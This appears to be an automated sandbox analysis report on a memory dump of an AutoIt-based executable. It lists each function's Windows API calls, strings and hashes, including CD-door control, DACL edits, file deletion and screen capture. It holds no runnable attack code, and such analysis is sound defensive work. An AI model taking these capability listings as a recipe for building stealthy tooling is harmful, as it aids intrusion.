Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 24d215658d9a63b2a4628543de1de1ec3bb2e076039b505b856dd4b8e60ce7ce
Instruction ID: 46228bca0a23f0a54e4aa6d743bca52ed000379d72148e6785726d4198757118
Opcode Fuzzy Hash: 24d215658d9a63b2a4628543de1de1ec3bb2e076039b505b856dd4b8e60ce7ce
Instruction Fuzzy Hash: D89171742083159FCB14EF50C861F6EB7A1AFA8314F14845CF9966B7A2CB30ED5ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 001AA5BD, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

CharLowerBuffW.USER32(?,?), ref: 001AA636
GetDriveTypeW.KERNEL32 ref: 001AA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001AA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001AA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001AA730

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

Strings

wait, xrefs: 001AA6ED
closed, xrefs: 001AA64A, 001AA653
open , xrefs: 001AA692
set cd door , xrefs: 001AA6D1
type cdaudio alias cd wait, xrefs: 001AA6AE
open, xrefs: 001AA65D
close, xrefs: 001AA63C
close cd wait, xrefs: 001AA71B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: fb43af9f199576d0cd4f984584d8a1785054a27f79f45b07b9f21f34e8917069
Instruction ID: 2893a9719eb986f23f8b9732b755638a6c44e06edc431dd3e6ffe6cfdb6c4c0b
Opcode Fuzzy Hash: fb43af9f199576d0cd4f984584d8a1785054a27f79f45b07b9f21f34e8917069
Instruction Fuzzy Hash: D5512AB51043059FC700EF20C98196AB7F5FFA8718F54496DF89A972A1DB31EE0ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 001AA45A, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001AA47A
__swprintf.LIBCMT ref: 001AA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 001AA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001AA4FE
_memset.LIBCMT ref: 001AA51D
_wcsncpy.LIBCMT ref: 001AA559
DeviceIoControl.KERNEL32 ref: 001AA58E
CloseHandle.KERNEL32(00000000), ref: 001AA599
RemoveDirectoryW.KERNEL32(?), ref: 001AA5A2
CloseHandle.KERNEL32(00000000), ref: 001AA5AC

Strings

\??\%s, xrefs: 001AA496
:, xrefs: 001AA4BD
\, xrefs: 001AA4B2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: dbe7cf14f1a51150031ac3cddb0112b6028ccbec07e6a966748b2eb8bbfb517e
Instruction ID: f7898a8dc8fb6200f996781ebea5013876fa5cad62a5404806068a66f4d7fbee
Opcode Fuzzy Hash: dbe7cf14f1a51150031ac3cddb0112b6028ccbec07e6a966748b2eb8bbfb517e
Instruction Fuzzy Hash: C131B2B5900209ABDB219FA0DC48FEB37BDEF89701F5041BAF908D2150E7709685CB25

Uniqueness

Uniqueness Score: -1.00%

Function 001CC49C, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001CC4EC
GetFocus.USER32(?,?,?,?), ref: 001CC4FC
GetDlgCtrlID.USER32 ref: 001CC507
_memset.LIBCMT ref: 001CC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001CC65D
GetMenuItemCount.USER32 ref: 001CC67D
GetMenuItemID.USER32(?,00000000), ref: 001CC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001CC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001CC70C
CheckMenuRadioItem.USER32 ref: 001CC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 001CC779

Strings

0, xrefs: 001CC62A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0e9c4e0d20727f790132dd8d539afb3b0cf57df24469bdcc7c23f61ae414331b
Instruction ID: 9ab8d92594d351c0694b6c57a17dd9d4ff2f6333e32b1ba1cac7308455fb9497
Opcode Fuzzy Hash: 0e9c4e0d20727f790132dd8d539afb3b0cf57df24469bdcc7c23f61ae414331b
Instruction Fuzzy Hash: 77814970208311AFDB10CF24D985F6BBBE9EBA8314F10492DF99997291D770DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001983F4, Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0019874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00198766
Part of subcall function 0019874A: GetLastError.KERNEL32(?,0019822A,?,?,?), ref: 00198770
Part of subcall function 0019874A: GetProcessHeap.KERNEL32(00000008,?,?,0019822A,?,?,?), ref: 0019877F
Part of subcall function 0019874A: HeapAlloc.KERNEL32(00000000,?,0019822A,?,?,?), ref: 00198786
Part of subcall function 0019874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0019879D

Part of subcall function 001987E7: GetProcessHeap.KERNEL32(00000008,00198240,00000000,00000000,?,00198240,?), ref: 001987F3
Part of subcall function 001987E7: HeapAlloc.KERNEL32(00000000,?,00198240,?), ref: 001987FA
Part of subcall function 001987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00198240,?), ref: 0019880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00198458
_memset.LIBCMT ref: 0019846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0019848C
GetLengthSid.ADVAPI32(?), ref: 0019849D
GetAce.ADVAPI32(?,00000000,?), ref: 001984DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001984F6
GetLengthSid.ADVAPI32(?), ref: 00198513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00198522
HeapAlloc.KERNEL32(00000000), ref: 00198529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0019854A
CopySid.ADVAPI32(00000000), ref: 00198551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00198582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001985A8
SetUserObjectSecurity.USER32 ref: 001985BC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 8cd7dee553d95a299ea2bcb0ef19baeb6a5b11dfea3756262f134d227f6533e7
Instruction ID: 44abcecb1dcbabd668723edb10d6577e148d1a4c4f277ed65b39aed3ec76bff3
Opcode Fuzzy Hash: 8cd7dee553d95a299ea2bcb0ef19baeb6a5b11dfea3756262f134d227f6533e7
Instruction Fuzzy Hash: DA61367190020AABDF00DFA4DC45EAEBBBAFF05700F14826AF915A7291DB31DA55CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001B762D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001B76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001B76AE
CreateCompatibleDC.GDI32(?), ref: 001B76BA
SelectObject.GDI32(00000000,?), ref: 001B76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 001B771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 001B7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 001B777B
SelectObject.GDI32(00000006,?), ref: 001B7783
DeleteObject.GDI32(?), ref: 001B778C
DeleteDC.GDI32(00000006), ref: 001B7793
ReleaseDC.USER32 ref: 001B779E

Strings

(, xrefs: 001B7723

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 4ec47d4bc1f2be04a26905dfb11d47ed08b630a1faa9484aeeadbf16bb0f329a
Instruction ID: 386dc7b2c57ce1f58f455ed60da0e9fff215d4a183ae951256ffa8d40e994e6c
Opcode Fuzzy Hash: 4ec47d4bc1f2be04a26905dfb11d47ed08b630a1faa9484aeeadbf16bb0f329a
Instruction Fuzzy Hash: 69514975904209EFDB15CFA8CC88EAEBBBAEF48710F14852DF94A97250D731A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001AA0B5, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,001CFB78), ref: 001AA0FC

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 001AA11E
__swprintf.LIBCMT ref: 001AA177
__swprintf.LIBCMT ref: 001AA190
_wprintf.LIBCMT ref: 001AA246
_wprintf.LIBCMT ref: 001AA264

Strings

Error: , xrefs: 001AA20E
Line %d (File "%s"):, xrefs: 001AA171, 001AA18A
"%s" (%d) : ==> %s:, xrefs: 001AA25F
^ ERROR, xrefs: 001AA1E8
"%s" (%d) : ==> %s:%s%s, xrefs: 001AA241

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 842bd030bedf351364556defd6fde80e72e1151339543a1af54d59cf8a57409a
Instruction ID: 296efdef385a1dec02511cf70270ca6854f0eb8f53327e63af50b3c1e413dc83
Opcode Fuzzy Hash: 842bd030bedf351364556defd6fde80e72e1151339543a1af54d59cf8a57409a
Instruction Fuzzy Hash: 44518F72900219BBCF15EBE0CD86EEEB779AF25300F500165F515B21A2EB316F58DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001A93DF, Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001A91E9: __time64.LIBCMT ref: 001A91F3

Part of subcall function 00145045: _fseek.LIBCMT ref: 0014505D

__wsplitpath.LIBCMT ref: 001A94BE

Part of subcall function 0016432E: __wsplitpath_helper.LIBCMT ref: 0016436E

_wcscpy.LIBCMT ref: 001A94D1
_wcscat.LIBCMT ref: 001A94E4
__wsplitpath.LIBCMT ref: 001A9509
_wcscat.LIBCMT ref: 001A951F
_wcscat.LIBCMT ref: 001A9532

Part of subcall function 001A922F: _memmove.LIBCMT ref: 001A9268
Part of subcall function 001A922F: _memmove.LIBCMT ref: 001A9277

_wcscmp.LIBCMT ref: 001A9479

Part of subcall function 001A99BE: _wcscmp.LIBCMT ref: 001A9AAE
Part of subcall function 001A99BE: _wcscmp.LIBCMT ref: 001A9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001A96DC
_wcsncpy.LIBCMT ref: 001A974F
DeleteFileW.KERNEL32(?,?), ref: 001A9785
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001A979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A97AC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A97BE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 0e49a83fd95769112cb0a8dd15579a0286d3d4c6a955c1369cb56556788c4b88
Instruction ID: f7e3e26b2e55b88003876d78f5bda97d125d72572ec7a5a90062a83ee17c6031
Opcode Fuzzy Hash: 0e49a83fd95769112cb0a8dd15579a0286d3d4c6a955c1369cb56556788c4b88
Instruction Fuzzy Hash: 11C12CB5D00229ABDF21DFA4CC85EDEBBBDAF55310F1040AAF609E7151DB309A848F65

Uniqueness

Uniqueness Score: -1.00%

Function 00146BEC, Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00160B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00146C6C,?,00008000), ref: 00160BB7

Part of subcall function 001448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001448A1,?,?,001437C0,?), ref: 001448CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00146D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00146E5A

Part of subcall function 001459CD: _wcscpy.LIBCMT ref: 00145A05

Part of subcall function 0016387D: _iswctype.LIBCMT ref: 00163885

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0017E8BF
EA06, xrefs: 0017E87B
AU3!, xrefs: 00146CC1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0017E84A
Error opening the file, xrefs: 0017E866, 0017E8E1
Bad directive syntax error, xrefs: 0017EBC6
Unterminated string, xrefs: 0017EC0D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: e15d17433971a33ef31877dae18b7606f19a207a19dc6b9762cb2f134d1713f1
Instruction ID: 7e070bd9edc20e41660e58c4375bd8740839601f35241bde30a6b11af60de1de
Opcode Fuzzy Hash: e15d17433971a33ef31877dae18b7606f19a207a19dc6b9762cb2f134d1713f1
Instruction Fuzzy Hash: 1A027C715083419FCB24EF24C881AAFBBF5AFA9314F14491DF48A972A2DB30D949CB53

Uniqueness

Uniqueness Score: -1.00%

Function 001445DF, Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001445F9
GetMenuItemCount.USER32 ref: 0017D7CD
GetMenuItemCount.USER32 ref: 0017D87D
GetCursorPos.USER32(?), ref: 0017D8C1
SetForegroundWindow.USER32(00000000), ref: 0017D8CA
TrackPopupMenuEx.USER32(00206890,00000000,?,00000000,00000000,00000000), ref: 0017D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0017D8E9

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 758b9ef55d9c6f33986e655cbdd8f3bf7e70bcfd199d12af6270a835521ed0f8
Instruction ID: bbaadac044344293e671b7dc9b83af216ad858f9d3d1dc7701b91aa2c4e389a5
Opcode Fuzzy Hash: 758b9ef55d9c6f33986e655cbdd8f3bf7e70bcfd199d12af6270a835521ed0f8
Instruction Fuzzy Hash: 61713870601209BFEB249F54EC49FAABF75FF05368F204216F519661E0C7B1AC60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C10A5, Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,001C0038,?,?), ref: 001C10BC

Strings

HKLM, xrefs: 001C113A
HKEY_CLASSES_ROOT, xrefs: 001C114F
HKEY_USERS, xrefs: 001C11BD
HKCR, xrefs: 001C1164
HKEY_LOCAL_MACHINE, xrefs: 001C1125
HKCU, xrefs: 001C11AC
HKCC, xrefs: 001C118A
HKEY_CURRENT_USER, xrefs: 001C119B
HKU, xrefs: 001C11CE
HKEY_CURRENT_CONFIG, xrefs: 001C1179

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: b08ecf475f43b1bb1c3e11f834fd772e1c50d476ed21a9fd453fbb78d929c93e
Instruction ID: 559880cf3da7adb54fb73e88137f7dbc41b0aa0b9eae8efc019eead8bf53ef11
Opcode Fuzzy Hash: b08ecf475f43b1bb1c3e11f834fd772e1c50d476ed21a9fd453fbb78d929c93e
Instruction Fuzzy Hash: E0414F3418424EABCF11EF90DD91AEB3725AF36350F644558FE915B292DB30ED2AC750

Uniqueness

Uniqueness Score: -1.00%

Function 001A5569, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

Part of subcall function 00147A84: _memmove.LIBCMT ref: 00147B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001A55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001A55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001A55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001A560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001A561C

Strings

status PlayMe mode, xrefs: 001A55CD
play PlayMe wait, xrefs: 001A5606
open , xrefs: 001A5581
close PlayMe, xrefs: 001A55E3, 001A5610
alias PlayMe, xrefs: 001A55AB
play PlayMe, xrefs: 001A5617

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c0507f726f5ae6a376f9ffb821648837071242ac7c8246c85a5e170c357bc04e
Instruction ID: 9ac230b6a2c049ee0ad91f3d38423e628a6d522e51debdd3a6185ca1f6d0d379
Opcode Fuzzy Hash: c0507f726f5ae6a376f9ffb821648837071242ac7c8246c85a5e170c357bc04e
Instruction Fuzzy Hash: BE11B2A495426D79D720A761CC8ADFF7B7DFFA2B00F800429B509A30E1DF640D05C5A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A48F3, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 001A490E
gethostname.WSOCK32(?,00000100), ref: 001A4928
gethostbyname.WSOCK32(?), ref: 001A4935
_wcscpy.LIBCMT ref: 001A495D
_memmove.LIBCMT ref: 001A4970
inet_ntoa.WSOCK32(?), ref: 001A497B
_strcat.LIBCMT ref: 001A4989
_wcscpy.LIBCMT ref: 001A49A0
WSACleanup.WSOCK32 ref: 001A49AE
_wcscpy.LIBCMT ref: 001A49BC

Strings

0.0.0.0, xrefs: 001A4957

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 84234860d50f63c39b7031442216c9814ecb7679e92968dc3d2cddf81983ea3a
Instruction ID: 676f1f6b67b458973b8294fa1b6efa89ccc8898d4974e7c99d71b381359f111e
Opcode Fuzzy Hash: 84234860d50f63c39b7031442216c9814ecb7679e92968dc3d2cddf81983ea3a
Instruction Fuzzy Hash: 35110A35904114AFCB24EB74DC06EEB77BCDF56714F0441BAF40596091EFB1DAD28691

Uniqueness

Uniqueness Score: -1.00%

Function 001A5217, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 001A521C

Part of subcall function 00160719: timeGetTime.WINMM ref: 0016071D

Sleep.KERNEL32(0000000A), ref: 001A5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 001A526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001A528E
SetActiveWindow.USER32 ref: 001A52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001A52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 001A52DA
Sleep.KERNEL32(000000FA), ref: 001A52E5
IsWindow.USER32 ref: 001A52F1
EndDialog.USER32(00000000), ref: 001A5302

Strings

BUTTON, xrefs: 001A5280

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: cb64d3807eb7b70a75eef998fdd32d8c28baec5428bba1f81ec806ae189b45fe
Instruction ID: 38f2b7bfa70547d485fef84f621c51817d6008a65f9a057b74273f6fbe172ef0
Opcode Fuzzy Hash: cb64d3807eb7b70a75eef998fdd32d8c28baec5428bba1f81ec806ae189b45fe
Instruction Fuzzy Hash: 3321CF74208704AFE7015B30FC8DF763F6BEB96356F441028F901815B2CBA1AC918B21

Uniqueness

Uniqueness Score: -1.00%

Function 001AD7F8, Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

CoInitialize.OLE32(00000000), ref: 001AD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001AD8E8
SHGetDesktopFolder.SHELL32(?), ref: 001AD8FC
CoCreateInstance.OLE32(001D2D7C,00000000,00000001,001FA89C,?), ref: 001AD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001AD9B7
CoTaskMemFree.OLE32(?,?), ref: 001ADA0F
_memset.LIBCMT ref: 001ADA4C
SHBrowseForFolderW.SHELL32(?), ref: 001ADA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001ADAAB
CoTaskMemFree.OLE32(00000000), ref: 001ADAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001ADAE9
CoUninitialize.OLE32(00000001,00000000), ref: 001ADAEB

Memory Dump Source

